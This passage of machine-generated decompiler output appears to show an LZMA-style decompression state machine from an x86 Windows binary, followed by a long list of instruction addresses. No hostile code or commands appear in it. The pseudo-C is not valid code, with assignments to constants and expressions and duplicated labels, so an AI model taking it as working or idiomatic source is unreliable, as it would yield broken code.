													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x00406402
                                                                                    0x00406408
                                                                                    0x0040641a
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x004063d6
                                                                                    0x004063dc
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x004069b7
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x004069d3
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
